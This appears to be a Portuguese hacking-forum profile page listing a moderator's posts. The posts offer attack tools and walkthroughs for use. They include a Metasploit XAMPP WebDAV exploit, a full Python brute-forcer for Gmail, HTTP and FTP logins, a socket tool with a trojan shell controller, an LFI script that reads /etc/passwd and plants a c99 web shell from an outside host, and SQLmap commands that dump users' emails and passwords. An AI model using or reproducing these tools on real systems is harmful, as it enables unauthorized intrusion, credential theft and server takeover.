Ir para conteúdo

FaceOs

Moderadores
  • Total de itens

    78
  • Registrado em

  • Última visita

  • Dias Ganhos

    6

FaceOs ganhou o dia em 14 de maio

FaceOs teve o conteúdo mais curtido!

Reputação

25 Excellent

1 Seguidor

Sobre FaceOs

  • Rank
    FaceOs

Últimos Visitantes

54 visualizações
  1. EXPLORANDO VULNERABILIDADE DE UPLOAD NO WEBDAV DO XAMPP ATRAVÉS DO METASPLOIT Bem pessoal, hoje vou lhes apresentar um exploit muito bacana no XAMPP que inclusive possui um módulo no Metasploit. Primeiramente, precisamos do Metasploit Framework no computador, certo? Ele possui tanto suas versões para Linux e Windows, através do site da Rapid7. Então, com o Metasploit instalado, vamos começar. Se você estiver no Windows, vá até a pasta do Metasploit e digite: msfconsole Ou console Caso esteja no Linux, instale com o install.sh ou mova os scripts do MSF para o "/root/bin". Pronto, quando o Metasploit carregar, digite: use exploit/windows/http/xampp_webdav_upload_php Após isso, irá carregar o módulo do exploit. Agora a gente irá setar as funções: RHOST, RPORT e EXPLOIT. No RHOST - A gente irá mencionar o nosso site/ip alvo. No RPORT - A gente irá setar a porta da conexão do alvo, pode ser 80, 8443, 8090,8033, 8080... Enfim. E no EXPLOIT - Nós iremos rodar o exploit e conseguir o Meterpreter no servidor, ou seja, upar a backdoor e ganhar a shell. Vamos lá então: set RHOST www.target.com set RPORT 80 exploit Ilustrações:
  2. Sim, sim. Jaja faço umas alterações no código. Eu esqueci de alguns detalhes, como a função help ;___;
  3. ServiceBrute - Ferramenta para ataques de brute-force em serviços SMTP, FTP e HTTP Como eu não consigo passar um dia sem escrever código, hoje não seria diferente :v Criei esse simples código para ataques de brute-force em serviços SMTP (G-Mail), FTP e HTTP. Segue o código: #!/usr/bin/python # -*- coding: cp1252 -*- from ftplib import FTP import smtplib import sys import os import platform import ftplib try: import colorama from colorama import Fore, Back, Style except ImportError: print "ERRO! - Necessario a biblioteca COLORAMA. \n Instale com - easy_install colorama" try: import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning except ImportError: print Fore.RED+"ERRO! - Necessario a biblioteca REQUESTS. \n Instale com - easy_install requests" colorama.init() so = platform.system() if(so=="Windows"): os.system("cls") else: os.system("clear") try: def help(): ajuda = """ HELP MODULE - ServiceBrute servicebrute.py --form 1 --email <target_email> --wordlist <passfile.txt> Example: servicebrute.py --form 1 --email [email protected] --wordlist passwordfile.txt servicebrute.py --form 2 --user <target_user> --wordlist <passfile.txt> --target <target_url> Example: servicebrute.py --form 2 --user admin --wordlist passwordfile.txt --target http://www.target.com servicebrute.py --form 3 --user <target_user> --wordlist <passsfile.txt> --target <target_url> Example: servicebrute.py --form 3 --user admin --wordlist passwordfile.txt --target http://www.target.com servicebrute.py --form 4 --user <target_user> --wordlist <passfile.txt> --target <target_url> Example: servicebrute.py --form 4 --user admin --wordlist passwordfile.txt --target ftp.target.com """ print(Fore.CYAN+ajuda) x = sys.argv if x[1] == "--form": forma = sys.argv[2] if forma == "1": if x[3] == "--email": email = sys.argv[4] if x[5] == "--wordlist": wordlist = sys.argv[6] wordlist = open(wordlist, "r") smtp = smtplib.SMTP("smtp.gmail.com", 587) smtp.ehlo() smtp.starttls() for senhas in wordlist: try: smtp.login(email, senhas) print Fore.GREEN+"Senha encontrada : \n E-mail - %s \n Senha - %s"%(email,senhas) break except smtplib.SMTPAuthenticationError: print Fore.RED+"Tentando login : \n E-MAIL - %s \n SENHA - %s"%(email,senhas) if x[1] == "--form": forma = sys.argv[2] if forma == "2": if x[3] == "--user": user = sys.argv[4] if x[5] == "--wordlist": wordlist = sys.argv[6] senha = open(wordlist, "r") if x[7] == "--target": target = sys.argv[8] for senhas in senha: r = requests.get(target+"/login.php?user="+user+"&password="+senhas) if r.status_code == 302: print Fore.GREEN+"[!] SENHA ENCONTRADA : \n Usuario: %s - \n Password: %s"%(user,senhas) else: print Fore.RED+"Tentando login : \n Usuario: %s - \n Password: %s"%(user,senhas) if x[1] == "--form": forma = sys.argv[2] if forma == "3": if x[3] == "--user": user = sys.argv[4] if x[5] == "--wordlist": wordlist = sys.argv[6] senha = open(wordlist, "r") if x[7] == "--target": target = sys.argv[8] form_user = (str(raw_input(Fore.GREEN+"Formulario de usuario: "))) form_pass = (str(raw_input(Fore.GREEN+"Formulario de senhas: "))) for senhas in senha: requests.packages.urllib3.disable_warnings(InsecureRequestWarning) payload = { form_user : user, form_pass : senhas } r = requests.post(target, data=payload, verify=False) if r.status_code == 302: print Fore.GREEN+"[!] SENHA ENCONTRADA : \n Usuario: %s - \n Password: %s"%(user,senhas) break else: print Fore.RED+"Tentando login : \n Usuario: %s - \n Password: %s"%(user,senhas) if x[1] == "--form": forma = sys.argv[2] if forma == "4": if x[3] == "--user": user = sys.argv[4] if x[5] == "--wordlist": wordlist = sys.argv[6] senha = open(wordlist, "r") if x[7] == "--target": target = sys.argv[8] for senhas in senha: try: ftp = FTP(target) ftp.login(user,senhas) print Fore.GREEN+"[!] SENHA ENCONTRADA : \n Usuario: %s - \n Password: %s"%(user,senhas) except ftplib.error_perm: print Fore.RED+"Tentando login : \n Usuario: %s - \n Password: %s"%(user,senhas) if x[1] == "--help": help() except IndexError: banner = """ )\ ) ( ) (()/( ( ( ) ( ( ( )\ ( ( ( /( ( /(_)) ))\ )( /(( )\ ( ))\ )((_) )( ))\ )\()) ))\ (_)) /((_)(()\ (_))\((_) )\ /((_)((_)_ (()\ /((_)(_))/ /((_) / __|(_)) ((_)_)((_)(_) ((_)(_)) | _ ) ((_)(_))( | |_ (_)) \__ \/ -_) | '_|\ V / | |/ _| / -_) | _ \| '_|| || || _|/ -_) |___/\___| |_| \_/ |_|\__| \___| |___/|_| \_,_| \__|\___| Ferramenta para bruteforce em servicos Desenvolvido por Derick Santos Conheça a FSociety Brasil: https://fsocietybrasil.org\n servicebrute.py --help para mais funções\n - [1] G-Mail BRUTEFORCE - [2] HTTP-GET BRUTEFORCE - [3] HTTP-POST BRUTEFORCE - [4] FTP BRUTEFORCE""" print(Fore.YELLOW+banner) except KeyboardInterrupt: print Fore.GREEN+"Até mais..."
  4. Flying - Script para manipulação de sockets

    Flying - Script para manipulação de sockets Pessoal, criei esta ferramenta para "manipulação de sockets" em Python. Ela é bastante parecida com o nc, porém com algumas funções voltadas mais para o pentest. Sendo elas: --listening | Função para escutar portas. --trojan | Função que ativa um cliente de um trojan. --dns | Retorna o Domain Name Service de um endereço IP. --grabing | Realiza um banner grabing HTTP. O código esta disponível para vocês compartilharem e até mesmo alterarem ele. Divirtam-se! #!/usr/bin/python # -*- coding:utf-8 -*- ####################################################### ### Desenvolvido por Derick Santos ### ### Conheça a Fsociety Brasil: fsocietybrasil.org ### ####################################################### try: import platform import socket import sys import os so = platform.system() if so == "Windows": os.system("cls") else: os.system("clear") x = sys.argv def help(): module = """ Flying - Ferramenta em Python para manipulação de sockets Desenvolvido por Derick Santos Conheça a FSociety Brasil: https://fsocietybrasil.org/ ############################################################## flying.py --listening <host> <port> | Escuta determinada porta Exemplo: flying.py --listening 127.0.0.1 3030 flying.py --trojan <host> <port> | Cliente de um trojan Exemplo: flying.py --trojan 127.0.0.1 3030 flying.py --dns <host> | Pegar DNS por endereço IP Exemplo: flying.py --dns 127.0.0.1 flying.py --grabing <host> | Realizar banner grabing em serviços HTTP Exemplo: flying.py --grabing www.google.com""" print(module) try: if(x[1]=="--listening"): host = sys.argv[2] port = (int(sys.argv[3])) print "Escutando porta %s de %s\n"%((port,host)) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((host,port)) s.listen(1) conn, addr = s.accept() print "Conexao de",addr while True: log = conn.recv(1024) if not log: break conn.sendall(log) conn.close() except: help() try: if(x[1]=="--trojan"): ip = sys.argv[2] port = (int(sys.argv[3])) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) s.bind((ip,port)) s.listen(5) print "\n: Esperando conexao..." conn, addr = s.accept() msg = conn.recv(512) print(msg) shell = True while shell == True: cmd = raw_input("B:\> ") conn.send(cmd) msg = conn.recv(10000000) print(msg) except: exit() try: if (x[1]=="--dns"): host = sys.argv[2] ip = socket.gethostbyname(host) d = socket.getfqdn(ip) print "DNS -> "+d except: exit() try: if (x[1]=="--grabing"): site = sys.argv[2] port = (int("80")) ip = socket.gethostbyname(site) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect_ex((ip,port)) s.send(b"GET /\n\n") banner = s.recv(10000) print "Banner - %s"%banner except: exit() except KeyboardInterrupt: print "Até mais!"
  5. Explorando falhas de UPLOAD com o BURP SUITE e o METASPLOIT Já disse e repito, o Burp Suite e o Metasploit, são algumas das principais ferramentas neste mundo do hacking. Hoje trago para vocês um vídeo fantástico ensinando a realizar a exploração de falhas de upload com as duas ferramentas. É ensinando no vídeo a criar uma shell (Backdoor) em PHP que realiza conexão reversa com a aplicação lhe dando o acesso ao servidor. É realmente um vídeo bastante interessante e mostra o quão bacana falhas de upload são. Enfim...
  6. Ataque de BRUTE-FORCE em serviços MySQL com o METASPLOIT O ataque de brute-force, é um ataque a qual auditamos em uma aplicação realizando um teste de login, ou seja, o atacante passa a lista de senhas, a lista de usuários e o programa vai tentando o login de forma automática no serviço rodando no alvo. O MySQL é um serviço de gerenciamento de banco de dados, o Metasploit bastante conhecido no mundo da segurança da informação tem módulos para enumerarem em um servidor MySQL. Neste tópico, lhes mostro um vídeo demonstrando um ataque de força bruta em serviços MySQL e um crack de hash MySQL através do próprio Metasploit.
  7. ESCALANDO PRIVILÉGIOS com EXPLOIT DIRTY COW

    ESCALANDO PRIVILÉGIOS com EXPLOIT DIRTY COW A escalação de privilégios, é uma técnica a qual um hacker/cracker invade o sistema e utiliza de exploits ou PoCs (Proof of Concept) para ganhar acessos administrativos ou seja, acessos de superusuarios independente do sistema. Hoje eu trago pra vocês, uma demonstração de uma escalada de privilégios através do exploit Dirty Cow.
  8. LFIFuck E ai pessoal, criei esta ferramenta para explorar falhas de Local File Include em aplicações com a vul. Ela no momento só explora através do "/etc/passwd" e a instalação de shells através de códigos em PHP. #!/usr/bin/python #Ferramenta para exploracao com falhas de Local File Include (LFI) #LFIFuck #Desenvolvido por Derick Santos #Conheca a Fsociety Brasil: fsocietybrasil.org try: import webbrowser import requests import platform import time import sys import os import re so = platform.system() if so != "Linux": os.system("cls") if so != "Windows": os.system("clear") except ImportError: print "[!] Erro! Necessario a biblioteca requests..." print "[!] easy_install.py requests" def help(): print "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" print "!!! lfifuck --url www.site.com/index.php?file= !!!" print "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" try: argumento = sys.argv if len(argumento) > 3: help() if argumento[1] == "--url": site = argumento[2] else: help() except IndexError: banner = """ ( ( ( ( )\ ) )\ ) )\ ) )\ ) ) (()/( (()/( (()/((()/( ( ( /( /(_)) /(_)) /(_))/(_)) ))\ ( )\()) (_)) (_))_|(_)) (_))_|/((_) )\ ((_)\ | | | |_ |_ _|| |_ (_))( ((_)| |(_) | |__ | __| | | | __|| || |/ _| | / / |____||_| |___||_| \_,_|\__| |_\_\ LFI exploiting tool Desenvolvido por Derick Santos lfifuck.py --help | Para mais informacoes """ print banner try: payload = "../../../../../../../../../../../../../../../etc/passwd" lfi = site+payload r = requests.get("http://"+lfi) html = r.text if r.status_code == 200: print "[/] SITE parece ser vulneravel...\n" if re.search(r"root:x",html): print "[!] SITE : Vulneravel..." time.sleep(1) print "\n[*] PAYLOAD : ADICIONADO : " print "" print "[1] Abrir browser no payload" print "[2] Instalar alguma shell no site\n" opt = raw_input("O que deseja fazer? ") if opt == "1": abrir = webbrowser.open(lfi) if opt == "2": shell_link = '<?php%20system("http://www.c99shell.biz.tr/shell/c99.txt");?>' r = requests.get("http://"+site+shell_link) move = '<?php%20system("mv%20c99.txt%20c99.php");?>' rname = requests.get("http://"+site+move) code = rname.text if re.search(r"c99",code): print "\n[!] SHELL : Adicionada " else: print "\n[!] SHELL : Nao adicionada... Erro no payload!" else: print "[!] SITE : Nao vulneravel!" except requests.exceptions.ConnectionError: print "[!] SITE : Nao vulneravel!" except KeyboardInterrupt: print "[!] Ate mais!" except NameError: print ""
  9. FcSF | FaceOs Framework

    @Unknown Mano, muito obrigado de coração <3
  10. FcSF | FaceOs Framework

    @doug Não sei criar um repositório KKKKKKKKKKKKJJ
  11. FcSF | FaceOs Framework

    FcSF | FaceOs Framework Pessoal, criei esse simples framework para information gathering. Ele tem simples funções no momento, mas futuramente pretendo atualiza-lo e adicionar mais funções nele. Download É necessario a biblioteca requests. Para baixa-la: easy_install requests ou: pip install requests
  12. UNISCAN

    @Lord13 https://www.activestate.com/activeperl/downloads
  13. UNISCAN

    Uniscan E aí pessoal hoje trago-lhes um tutorial da ferramenta Uniscan. Vou ensina-los a coletar informações e escanear vulnerabilidades com ele. Então vamos lá. Bem, se você estiver no Linux dê um: wget https://github.com/poerschke/Uniscan/archive/master.zip Ou git clone https://github.com/poerschke/Uniscan/ Eu como estou no Windows, baixei pelo browser. Você pode fazer o mesmo. Enfim... Com Uniscan baixado, basta extrairmos os arquivos, abrir o Terminal/CMD e ir até a pasta dele. Com a pasta do Uniscan aberta, digite: perl uniscan.pl -h Com isto, iremos ver as funções do programa. Vamos começar pela primeira função, digite: perl uniscan.pl -u <site> Com esta sintaxe, a gente esta dizendo pro programa escanear o site que a gente selecionou. Agora vamos na segunda função, digite: perl uniscan.pl -f <nome_de_um_arquivo_com_lista_de_sites> Bem, vou explicar com mais calma pra vocês. Esta sintaxe, diz ao programa, para escanear os sites do arquivo de texto. Ai ele vai realizar o scan em cada site da lista. Já na terceira função, digite: perl uniscan.pl -u <site> -q Com esta função, o programa vai checar diversos diretórios do site. Muito legal para a coleta de informações. Na quarta função, digite: perl unisca.pl -u <site> -w Com esta função, o programa vai procurar por arquivos com alguma vulnerabilidade no site. Agora a quarta função: perl uniscan.pl -u <site> -e Com esta função, o programa vai procurar pelo robots.txt. Agora, na quinta função, tenho certeza que é a que mais vão gostar: perl uniscan.pl -u <site> -d Com esta função, o programa vai realizar testes dinâmicos, ou seja, ele vai buscar pelas vulnerabilidades no serviço web. Agora, outra função SHOW de bola do Uniscan: perl uniscan.pl -u <site> -s Com esta função, o programa realiza testes estáticos, procura por arquivos de backup, realiza busca por informações de cache e uma série de coisas. Agora, outra função bastante legal do programa é: perl uniscan.pl -u <site> -r Com esta função, o programa realiza testes de stress e vê se o site possui vulnerabilidades de negação de serviço. Enfim, terminei aqui de mostrar as funções mais legais do programa, e caso você queira usar todas elas de uma vez, basta digitar: perl uniscan.pl -u <site> -qweds Também tem outras funções que são as de busca por dorks: perl uniscan.pl -o <inurl/intitle/intext/filetype/site:"dork"> Esta função, faz a busca de dorks pelo Google. E esta: perl uniscan.pl -i <inurl/intitle/intext/filetype/site:"dork"> Pelo o bing. Então pessoal, este basicamente foi o tutorial. Espero que tenham gostado, e que gostem da ferramenta também. É uma excelente ferramenta para a arte do information gathering e espero que gostem dela. Obrigado, até a proxima
  14. SQL Injection método POST com o SQLmap

    SQL Injection método POST com o SQLmap E ai pessoal, hoje trago para vocês um tutorial ensinando a explorar o SQL injection no método POST através do SQLmap. Não é aquele método de bypass, ok? Nesse tipo de SQLi POST, a gente executa comandos SQL através dos formulários (Ok, é quase a mesma coisa) só que este método é mais eficiente. A partir dele a gente consegue pegar as informações do banco de dados como pelo método GET, só que através de formulários. Então vamos lá, eu tenho aqui um site para testes (O mesmo usado na aula anterior), que é o do Acunetix. A página de formulário com a vulnerabilidade é a "/userinfo.php" Então vamos ao tutorial. Primeiramente tu vai precisar baixar o SQLmap. Agora, vamos descompactar, e ir até a pasta pelo Terminal/CMD Enfim, isso vocês ja sabem fazer rs Agora vamos digitar o seguinte comando: python sqlmap.py -u http://testphp.vulnweb.com/userinfo.php --dbs --forms Com esta sintaxe, o sqlmap irá executar e testará os payloads. Ai você irá lendo as opções que irem aparecendo, e digitar o Y ou N. Logo após isto, digite: python sqlmap.py -u http://testphp.vulnweb.com/userinfo.php -D acuart --tables --forms A partir disso, ja temos a certeza de que o site é vulnerável. Com isso iremos extrair as colunas do banco de dados "Acuart" através de formulários. Após as tabelas aparecerem, digite: python sqlmap.py -u http://testphp.vulnweb.com/userinfo.php -D acuart -T users --columns --forms Com isso, ja que tivemos acesso ao nome anterior das tabelas, com esse comando vamos extrair as colunas das tabelas. Após aparecer as colunas, chegamos ao fim, vamos dumpar tudo: python sqlmap.py -u http://testphp.vulnweb.com/userinfo.php -D acuart -T users -C email,pass --forms --dump Pronto! Resumindo oque foi feito, o SQLmap, fez uma requisição ao site e através do método POST ele fez a injeção de comandos do SQL a fim de conseguir oque a gente quisesse do banco de dados. Ilustrações:
×

Informação Importante

Ao usar este site, você concorda com nossos Termos de Uso.